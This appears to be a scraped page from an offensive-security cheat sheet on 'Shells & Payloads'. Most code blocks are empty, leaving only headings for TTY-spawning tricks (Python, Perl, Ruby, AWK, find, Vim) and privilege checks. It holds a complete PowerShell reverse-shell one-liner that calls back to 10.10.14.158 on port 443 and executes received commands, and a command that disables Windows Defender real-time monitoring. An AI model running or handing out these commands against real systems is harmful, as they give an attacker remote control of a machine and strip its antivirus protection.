search

๐ŸšShells & Payloads

Reference

hashtag
Powershell

Code (PowerShell)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

hashtag
Disable AV

Code

Set-MpPreference -DisableRealtimeMonitoring $true

hashtag
ConPtyShell - Windows System

reference

code (client side)

example (.php)

code (server side)

example

hashtag
TTY SHELL - SPAWNING INTERACTIVE SHELL

hashtag
Interactive Python (TTY Shell)

Code

hashtag
/bin/sh -i

Code

hashtag
Perl To Shell

Code

Code (Run from a script)

hashtag
Ruby To Shell

Code (Run from a script)

hashtag
Lua To Shell

Code (Run from a script)

hashtag
AWK To Shell

Code

hashtag
Using Find For A Shell

Code

  • This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.

hashtag
Using Exec To Launch A Shell

Code

  • This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.

hashtag
Vim To Shell

Code

hashtag
Vim Escape

Code

hashtag
Execution Permissions

hashtag
Permission

Code

hashtag
Sudo -l

Code

PreviousUsermod / HostnameNextFile Transfer

Last updated